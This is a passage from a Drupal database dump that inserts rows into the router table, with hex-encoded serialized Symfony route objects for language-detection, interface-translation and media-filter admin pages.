76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33393a222f61646d696e2f636f6e6669672f726567696f6e616c2f636f6e74656e742d6c616e6775616765223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('language.negotiation', '/admin/config/regional/language/detection', '/admin/config/regional/language/detection', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34313a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34363a225c44727570616c5c6c616e67756167655c466f726d5c4e65676f74696174696f6e436f6e666967757265466f726d223b733a363a225f7469746c65223b733a32333a22446574656374696f6e20616e642073656c656374696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a2261646d696e6973746572206c616e677561676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34383a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34313a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a34313a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('language.negotiation_browser', '/admin/config/regional/language/detection/browser', '/admin/config/regional/language/detection/browser', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34393a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f62726f77736572223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34343a225c44727570616c5c6c616e67756167655c466f726d5c4e65676f74696174696f6e42726f77736572466f726d223b733a363a225f7469746c65223b733a34303a2242726f77736572206c616e677561676520646574656374696f6e20636f6e66696775726174696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a2261646d696e6973746572206c616e677561676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35363a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f62726f77736572247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34393a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f62726f77736572223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a34393a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f62726f77736572223b733a383a226e756d5061727473223b693a363b7d7d, 6);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('language.negotiation_browser_delete', '/admin/config/regional/language/detection/browser/delete/{browser_langcode}', '/admin/config/regional/language/detection/browser/delete/%', 254, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37353a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f62726f777365722f64656c6574652f7b62726f777365725f6c616e67636f64657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35303a225c44727570616c5c6c616e67756167655c466f726d5c4e65676f74696174696f6e42726f7773657244656c657465466f726d223b733a363a225f7469746c65223b733a363a2244656c657465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a2261646d696e6973746572206c616e677561676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a2262726f777365725f6c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39323a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f62726f777365722f64656c6574652f283f503c62726f777365725f6c616e67636f64653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a2262726f777365725f6c616e67636f6465223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a35363a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f62726f777365722f64656c657465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a2262726f777365725f6c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235343b733a31343a227061747465726e4f75746c696e65223b733a35383a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f62726f777365722f64656c6574652f25223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('language.negotiation_selected', '/admin/config/regional/language/detection/selected', '/admin/config/regional/language/detection/selected', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35303a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f73656c6563746564223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34353a225c44727570616c5c6c616e67756167655c466f726d5c4e65676f74696174696f6e53656c6563746564466f726d223b733a363a225f7469746c65223b733a33313a2253656c6563746564206c616e677561676520636f6e66696775726174696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a2261646d696e6973746572206c616e677561676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35373a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f73656c6563746564247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a35303a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f73656c6563746564223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f73656c6563746564223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('language.negotiation_session', '/admin/config/regional/language/detection/session', '/admin/config/regional/language/detection/session', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34393a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f73657373696f6e223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34343a225c44727570616c5c6c616e67756167655c466f726d5c4e65676f74696174696f6e53657373696f6e466f726d223b733a363a225f7469746c65223b733a34303a2253657373696f6e206c616e677561676520646574656374696f6e20636f6e66696775726174696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a2261646d696e6973746572206c616e677561676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35363a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f73657373696f6e247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34393a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f73657373696f6e223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a34393a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f73657373696f6e223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('language.negotiation_url', '/admin/config/regional/language/detection/url', '/admin/config/regional/language/detection/url', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34353a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f75726c223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34303a225c44727570616c5c6c616e67756167655c466f726d5c4e65676f74696174696f6e55726c466f726d223b733a363a225f7469746c65223b733a33363a2255524c206c616e677561676520646574656374696f6e20636f6e66696775726174696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a2261646d696e6973746572206c616e677561676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35323a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f75726c247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34353a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f75726c223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f646574656374696f6e2f75726c223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('locale.check_translation', '/admin/reports/translations/check', '/admin/reports/translations/check', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33333a222f61646d696e2f7265706f7274732f7472616e736c6174696f6e732f636865636b223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a36303a225c44727570616c5c6c6f63616c655c436f6e74726f6c6c65725c4c6f63616c65436f6e74726f6c6c65723a3a636865636b5472616e736c6174696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a227472616e736c61746520696e74657266616365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34303a227b5e2f61646d696e2f7265706f7274732f7472616e736c6174696f6e732f636865636b247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f7265706f7274732f7472616e736c6174696f6e732f636865636b223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f7265706f7274732f7472616e736c6174696f6e732f636865636b223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('locale.settings', '/admin/config/regional/translate/settings', '/admin/config/regional/translate/settings', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34313a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f73657474696e6773223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33383a225c44727570616c5c6c6f63616c655c466f726d5c4c6f63616c6553657474696e6773466f726d223b733a363a225f7469746c65223b733a33303a22496e74657266616365207472616e736c6174696f6e2073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a227472616e736c61746520696e74657266616365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34383a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f73657474696e6773247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34313a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f73657474696e6773223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a34313a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f73657474696e6773223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('locale.translate_export', '/admin/config/regional/translate/export', '/admin/config/regional/translate/export', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33393a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f6578706f7274223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33303a225c44727570616c5c6c6f63616c655c466f726d5c4578706f7274466f726d223b733a363a225f7469746c65223b733a32383a22496e74657266616365207472616e736c6174696f6e206578706f7274223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a227472616e736c61746520696e74657266616365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34363a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f6578706f7274247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f6578706f7274223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a33393a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f6578706f7274223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('locale.translate_import', '/admin/config/regional/translate/import', '/admin/config/regional/translate/import', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33393a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f696d706f7274223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33303a225c44727570616c5c6c6f63616c655c466f726d5c496d706f7274466f726d223b733a363a225f7469746c65223b733a32383a22496e74657266616365207472616e736c6174696f6e20696d706f7274223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a227472616e736c61746520696e74657266616365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34363a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f696d706f7274247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f696d706f7274223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a33393a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f696d706f7274223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('locale.translate_page', '/admin/config/regional/translate', '/admin/config/regional/translate', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33323a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35373a225c44727570616c5c6c6f63616c655c436f6e74726f6c6c65725c4c6f63616c65436f6e74726f6c6c65723a3a7472616e736c61746550616765223b733a363a225f7469746c65223b733a32363a225573657220696e74657266616365207472616e736c6174696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a227472616e736c61746520696e74657266616365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33393a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33323a222f61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c617465223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('locale.translate_status', '/admin/reports/translations', '/admin/reports/translations', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32373a222f61646d696e2f7265706f7274732f7472616e736c6174696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34313a225c44727570616c5c6c6f63616c655c466f726d5c5472616e736c6174696f6e537461747573466f726d223b733a363a225f7469746c65223b733a32393a22417661696c61626c65207472616e736c6174696f6e2075706461746573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a227472616e736c61746520696e74657266616365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33343a227b5e2f61646d696e2f7265706f7274732f7472616e736c6174696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7265706f7274732f7472616e736c6174696f6e73223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32373a222f61646d696e2f7265706f7274732f7472616e736c6174696f6e73223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('media.filter.preview', '/media/{filter_format}/preview', '/media/%/preview', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33303a222f6d656469612f7b66696c7465725f666f726d61747d2f70726576696577223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35353a225c44727570616c5c6d656469615c436f6e74726f6c6c65725c4d6564696146696c746572436f6e74726f6c6c65723a3a70726576696577223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31373a2266696c7465725f666f726d61742e757365223b733a31343a225f637573746f6d5f616363657373223b733a37343a225c44727570616c5c6d656469615c436f6e74726f6c6c65725c4d6564696146696c746572436f6e74726f6c6c65723a3a666f726d6174557365734d65646961456d62656446696c746572223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a2266696c7465725f666f726d6174223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a66696c7465725f666f726d6174223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f